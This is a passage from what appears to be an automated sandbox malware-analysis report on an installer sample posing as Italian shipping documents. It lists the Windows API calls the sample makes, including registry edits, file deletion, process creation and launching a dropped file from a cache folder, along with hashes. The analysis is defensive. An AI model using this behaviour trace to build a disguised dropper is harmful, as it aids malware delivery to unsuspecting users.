                                              • Part of subcall function 00405110: lstrlenA.KERNEL32(00402D22,Skipped: C:\Users\user\AppData\Local\Temp\nsgDADD.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D22,00000000), ref: 00405159
                                              • Part of subcall function 00405110: lstrcatA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsgDADD.tmp\System.dll,00402D22,00402D22,Skipped: C:\Users\user\AppData\Local\Temp\nsgDADD.tmp\System.dll,00000000,00000000,00000000), ref: 0040516C
                                              • Part of subcall function 00405110: SetWindowTextA.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsgDADD.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsgDADD.tmp\System.dll), ref: 0040517E
                                              • Part of subcall function 00405110: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004051A4
                                              • Part of subcall function 00405110: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 004051BE
                                              • Part of subcall function 00405110: SendMessageA.USER32(?,00001013,?,00000000), ref: 004051CC
                                              • Part of subcall function 00405688: CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00421538,Error launching installer), ref: 004056B1
                                              • Part of subcall function 00405688: CloseHandle.KERNEL32(?), ref: 004056BE
                                            • WaitForSingleObject.KERNEL32(?,00000064,00000000,000000EB,00000000), ref: 00401EED
                                            • GetExitCodeProcess.KERNEL32(?,?), ref: 00401EFD
                                            • CloseHandle.KERNELBASE(?,00000000,000000EB,00000000), ref: 00401F22
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2621262951.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2621246363.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621284624.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621385916.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_Documenti di spedizione.jbxd
                                            Similarity
                                            • API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcat
                                            • String ID:
                                            • API String ID: 3521207402-0
                                            • Opcode ID: e995d9f419432ab23205a23d5c1414ada8c426ee2d3ef18cbb1adcd6d691f71f
                                            • Instruction ID: d3d55c0d0bbc33f725c23921dd181786adb59914180f86dd2947d51e8879a6ae
                                            • Opcode Fuzzy Hash: e995d9f419432ab23205a23d5c1414ada8c426ee2d3ef18cbb1adcd6d691f71f
                                            • Instruction Fuzzy Hash: 3C019231E04106EBCF20AF91CD49AAE7BB1EB40314F10807BF605B61E1C7794A859B9E
                                            APIs
                                              • Part of subcall function 00402BD8: RegOpenKeyExA.KERNELBASE(00000000,00000496,00000000,00000022,00000000,?,?), ref: 00402C00
                                            • RegEnumKeyA.ADVAPI32(00000000,00000000,?,000003FF), ref: 00402527
                                            • RegEnumValueA.ADVAPI32(00000000,00000000,?,?), ref: 0040253A
                                            • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsgDADD.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 0040254F
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2621262951.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2621246363.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621284624.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621385916.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_Documenti di spedizione.jbxd
                                            Similarity
                                            • API ID: Enum$CloseOpenValue
                                            • String ID:
                                            • API String ID: 167947723-0
                                            • Opcode ID: 05547f92edfa2ad71c40473a60083347d41093bd1c43fb3d169fc0aa66b556e7
                                            • Instruction ID: 11bb5dddaf85e4de06b60e46a4a286c6c0f73d8de59455db5a8421e4b605592f
                                            • Opcode Fuzzy Hash: 05547f92edfa2ad71c40473a60083347d41093bd1c43fb3d169fc0aa66b556e7
                                            • Instruction Fuzzy Hash: 5601DFB1A04201FFE7119F65AD88ABF7ABCDF40395F20003FF105A61C0D6B84A41966A
                                            APIs
                                            • RegOpenKeyExA.KERNELBASE(80000002,00406023,00000000,00000002,?,00000002,?,?,00406023,80000002,Software\Microsoft\Windows\CurrentVersion,?,Call,?), ref: 00405E07
                                            • RegQueryValueExA.KERNELBASE(?,?,00000000,00406023,?,00406023), ref: 00405E28
                                            • RegCloseKey.KERNELBASE(?), ref: 00405E49
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2621262951.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2621246363.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621284624.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621385916.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_Documenti di spedizione.jbxd
                                            Similarity
                                            • API ID: CloseOpenQueryValue
                                            • String ID:
                                            • API String ID: 3677997916-0
                                            • Opcode ID: 0c8888e50600bbfc423f29d3e13c34afc4b2d72f1a725d9a4029968a390a76be
                                            • Instruction ID: a5bfd4e994019c5e115080bbecddc2f5f1976c63067f757e38b3d402cdd28771
                                            • Opcode Fuzzy Hash: 0c8888e50600bbfc423f29d3e13c34afc4b2d72f1a725d9a4029968a390a76be
                                            • Instruction Fuzzy Hash: 5F014C7154020AEFDB118F64DD48EDB3FACEF14354B004036FA4596220D235DA64CBA5
                                            APIs
                                              • Part of subcall function 00405B45: GetFileAttributesA.KERNELBASE(?,?,0040575D,?,?,00000000,00405940,?,?,?,?), ref: 00405B4A
                                              • Part of subcall function 00405B45: SetFileAttributesA.KERNELBASE(?,00000000), ref: 00405B5E
                                            • RemoveDirectoryA.KERNEL32(?,?,?,00000000,00405940), ref: 0040576C
                                            • DeleteFileA.KERNELBASE(?,?,?,00000000,00405940), ref: 00405774
                                            • SetFileAttributesA.KERNEL32(?,00000000), ref: 0040578C
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2621262951.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2621246363.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621284624.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621385916.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_Documenti di spedizione.jbxd
                                            Similarity
                                            • API ID: File$Attributes$DeleteDirectoryRemove
                                            • String ID:
                                            • API String ID: 1655745494-0
                                            • Opcode ID: ecb533084f054dec527d8ee4002c22eb7271b0964ed621fa894de998c2c2fbf7
                                            • Instruction ID: 95a73edef03a3fe4ea7fa24255aadd7873cdb690117aa2712c5123595e980fc6
                                            • Opcode Fuzzy Hash: ecb533084f054dec527d8ee4002c22eb7271b0964ed621fa894de998c2c2fbf7
                                            • Instruction Fuzzy Hash: F2E02B31108A9197C21067349D0CB5F6AD5EFC6314F044A36F991F31C1C73858069EBE
                                            APIs
                                            • ShellExecuteA.SHELL32(?,00000000,00000000,00000000,C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\semirigorously\Subarachnoid,?), ref: 00401E9F
                                            Strings
                                            • C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\semirigorously\Subarachnoid, xrefs: 00401E8A
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2621262951.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2621246363.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621284624.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621385916.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_Documenti di spedizione.jbxd
                                            Similarity
                                            • API ID: ExecuteShell
                                            • String ID: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\semirigorously\Subarachnoid
                                            • API String ID: 587946157-2470430059
                                            • Opcode ID: 62972551e4f607768522ca5215d0e9555a819d9815caab0e71c71de7bb35adcf
                                            • Instruction ID: 7c51c884e7587c3efeb31cb3e5c9943a81f4090218bfe93557c80408bc49aec8
                                            • Opcode Fuzzy Hash: 62972551e4f607768522ca5215d0e9555a819d9815caab0e71c71de7bb35adcf
                                            • Instruction Fuzzy Hash: 58F0F671B14104BADB21ABB59F4AE6D2AA5DB81318F38043BF050F71C2D9FD8942DB28
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2629006314.0000000010001000.00000020.00000001.01000000.00000007.sdmp, Offset: 10000000, based on PE: true
                                            • Associated: 00000000.00000002.2628993182.0000000010000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2629018868.0000000010003000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2629030864.0000000010005000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_10000000_Documenti di spedizione.jbxd
                                            Similarity
                                            • API ID: EnumErrorLastWindows
                                            • String ID:
                                            • API String ID: 14984897-0
                                            • Opcode ID: 7af5c486cb8ea8547353861cfd678fbd8d20862330e18d67419e74999799b2ae
                                            • Instruction ID: 700bf99a33fcd989ee77f819fa46e2371db99389a88ce2eb288524e3b596c0af
                                            • Opcode Fuzzy Hash: 7af5c486cb8ea8547353861cfd678fbd8d20862330e18d67419e74999799b2ae
                                            • Instruction Fuzzy Hash: 9751A2BA908214DFFB10DF64DCC674937A4EB443D4F21842AEA08E726DCF34A9808B95
                                            APIs
                                            • SetFilePointer.KERNELBASE(00409130,00000000,00000000,00000000,00000000,?,?,00402F9C,000000FF,00000000,00000000,00409130,?), ref: 00403015
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2621262951.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2621246363.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621284624.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621385916.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_Documenti di spedizione.jbxd
                                            Similarity
                                            • API ID: FilePointer
                                            • String ID:
                                            • API String ID: 973152223-0
                                            • Opcode ID: a1130b4f43b5ef58eef6a304646b232a08a6a9d0fa451b453d71d72267b47fb8
                                            • Instruction ID: 0c39837240ac6e21a4d945e0ab2cbfd2cf40700f690e74d620895d0cf024726c
                                            • Opcode Fuzzy Hash: a1130b4f43b5ef58eef6a304646b232a08a6a9d0fa451b453d71d72267b47fb8
                                            • Instruction Fuzzy Hash: 83316D30202219FFDB109F56EC85A9A3AACEB00355F20C53AF905E6195D339DE40EBA9
                                            APIs
                                              • Part of subcall function 00402BD8: RegOpenKeyExA.KERNELBASE(00000000,00000496,00000000,00000022,00000000,?,?), ref: 00402C00
                                            • RegQueryValueExA.ADVAPI32(00000000,00000000,?,?,?,?), ref: 004024B3
                                            • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsgDADD.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 0040254F
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2621262951.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2621246363.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621284624.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621385916.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_Documenti di spedizione.jbxd
                                            Similarity
                                            • API ID: CloseOpenQueryValue
                                            • String ID:
                                            • API String ID: 3677997916-0
                                            • Opcode ID: 842ccded7b04f1c996c394db29755cab0eaefbc32d4fd585d2de1ae204d8f70a
                                            • Instruction ID: 85d806923b24475f53c36965a20abc0d18f92dd5d526b72c5aa3047674b5102d
                                            • Opcode Fuzzy Hash: 842ccded7b04f1c996c394db29755cab0eaefbc32d4fd585d2de1ae204d8f70a
                                            • Instruction Fuzzy Hash: 7611C171A04205FFDB20CF60CA985AEBBB4AF00359F20443FE142B72C0D2B84A85DB5A
                                            APIs
                                            • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                            • SendMessageA.USER32(?,00000402,00000000), ref: 004013F4
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2621262951.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2621246363.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621284624.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621385916.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_Documenti di spedizione.jbxd
                                            Similarity
                                            • API ID: MessageSend
                                            • String ID:
                                            • API String ID: 3850602802-0
                                            • Opcode ID: 6f3fd260d9a20665192313664cef065be83871c58b0681ff97f62226ed226405
                                            • Instruction ID: 8ec6bfb8ef4f3ff43576048fe9568e939b5e998f238dec90285f5c94a9fc96e2
                                            • Opcode Fuzzy Hash: 6f3fd260d9a20665192313664cef065be83871c58b0681ff97f62226ed226405
                                            • Instruction Fuzzy Hash: 2201F431B24210ABE7294B389E04B6A36A8F710314F11823BF911F66F1D7B8DC029B4D
                                            APIs
                                              • Part of subcall function 00402BD8: RegOpenKeyExA.KERNELBASE(00000000,00000496,00000000,00000022,00000000,?,?), ref: 00402C00
                                            • RegDeleteValueA.ADVAPI32(00000000,00000000,00000033), ref: 00402396
                                            • RegCloseKey.ADVAPI32(00000000), ref: 0040239F
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2621262951.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2621246363.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621284624.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621385916.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_Documenti di spedizione.jbxd
                                            Similarity
                                            • API ID: CloseDeleteOpenValue
                                            • String ID:
                                            • API String ID: 849931509-0
                                            • Opcode ID: ce34e0a5a3cad0306182936bac4226b47a4e95e33cdd8971417c4bf24fbf648c
                                            • Instruction ID: 7cc126104223fee90c4482272470a44d0e33bb4baa6becb9c0b30a5ba769ccb5
                                            • Opcode Fuzzy Hash: ce34e0a5a3cad0306182936bac4226b47a4e95e33cdd8971417c4bf24fbf648c
                                            • Instruction Fuzzy Hash: 25F0A472A00111ABD720AFA09A8E9BE76B89B40344F24043BF201B71C0D5BD5D028769
                                            APIs
                                            • lstrlenA.KERNEL32(00000000,00000011), ref: 004025B1
                                            Strings
                                            • C:\Users\user\AppData\Local\Temp\nsgDADD.tmp\System.dll, xrefs: 004025A2, 004025C7
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2621262951.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2621246363.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621284624.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621385916.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_Documenti di spedizione.jbxd
                                            Similarity
                                            • API ID: lstrlen
                                            • String ID: C:\Users\user\AppData\Local\Temp\nsgDADD.tmp\System.dll
                                            • API String ID: 1659193697-1612613294
                                            • Opcode ID: 9108d4ceed508d8a02313cc574e378f3b7a987aa5820872456f395d40ec67233
                                            • Instruction ID: 2bf8431ce51e6c58f43ec2947d6bdc143d6e81ddf8616a76c722d5425931f27b
                                            • Opcode Fuzzy Hash: 9108d4ceed508d8a02313cc574e378f3b7a987aa5820872456f395d40ec67233
                                            • Instruction Fuzzy Hash: 82F0E272A08244BACB20FBB55E4AA9F6AA4CBC1314B34403FF141B71C2C6BC4542DA2D
                                            APIs
                                            • ExpandEnvironmentStringsA.KERNELBASE(00000000,?,00000400,00000001), ref: 00401A31
                                            • lstrcmpA.KERNEL32(?,?,?,00000400,00000001), ref: 00401A44
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2621262951.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2621246363.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621284624.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621385916.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_Documenti di spedizione.jbxd
                                            Similarity
                                            • API ID: EnvironmentExpandStringslstrcmp
                                            • String ID:
                                            • API String ID: 1938659011-0
                                            • Opcode ID: 99ff6f7ebc29e3294f0bf96d9ec24245debac9b57580bca197066bfebfa759a6
                                            • Instruction ID: ab1dd0d9c5eb94bf9ce54f5104db011015230574e834771f483328ebd508fd9c
                                            • Opcode Fuzzy Hash: 99ff6f7ebc29e3294f0bf96d9ec24245debac9b57580bca197066bfebfa759a6
                                            • Instruction Fuzzy Hash: 9DF08271B05241EBCB20DF659D45A9B7FE8EFD1394B10843BE145F6190D2388541DA69
                                            APIs
                                            • ShowWindow.USER32(00000000,00000000), ref: 00401E43
                                            • EnableWindow.USER32(00000000,00000000), ref: 00401E4E
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2621262951.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2621246363.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621284624.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621385916.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_Documenti di spedizione.jbxd
                                            Similarity
                                            • API ID: Window$EnableShow
                                            • String ID:
                                            • API String ID: 1136574915-0
                                            • Opcode ID: 36dcea6e1d224af34142dbcc53fa3142b8bf20b1b5b4f1e3402a8bbf529d307d
                                            • Instruction ID: 6bc854546bde8c1d97c50108fc272036e6fafce41083740c3c393c21766323e0
                                            • Opcode Fuzzy Hash: 36dcea6e1d224af34142dbcc53fa3142b8bf20b1b5b4f1e3402a8bbf529d307d
                                            • Instruction Fuzzy Hash: 2BE012B2B08211BFEB14EFB4E9895AE7BB4EF40325B20403BE401F11D1D67D59419B59
                                            APIs
                                            • ShowWindow.USER32(00000000), ref: 00401581
                                            • ShowWindow.USER32(00010492), ref: 00401596
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2621262951.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2621246363.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621284624.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621385916.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_Documenti di spedizione.jbxd
                                            Similarity
                                            • API ID: ShowWindow
                                            • String ID:
                                            • API String ID: 1268545403-0
                                            • Opcode ID: 17699a1f730cc25233c13bc64813f1e04f0aaa057b5d2da36e90e35cf9de59ca
                                            • Instruction ID: 1fba713723e617fd63a9d4476e2d2033a2576266d828a69d52802257caf8ad67
                                            • Opcode Fuzzy Hash: 17699a1f730cc25233c13bc64813f1e04f0aaa057b5d2da36e90e35cf9de59ca
                                            • Instruction Fuzzy Hash: 42E086B6B00115BBCB24DF64EE9087E77B6E784320750043FD502B3290C2B69D429B58
                                            APIs
                                            • GetModuleHandleA.KERNEL32(?,?,?,00403329,00000009), ref: 004062A2
                                            • GetProcAddress.KERNEL32(00000000,?), ref: 004062BD
                                              • Part of subcall function 00406222: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00406239
                                              • Part of subcall function 00406222: wsprintfA.USER32 ref: 00406272
                                              • Part of subcall function 00406222: LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 00406286
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2621262951.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2621246363.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621284624.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
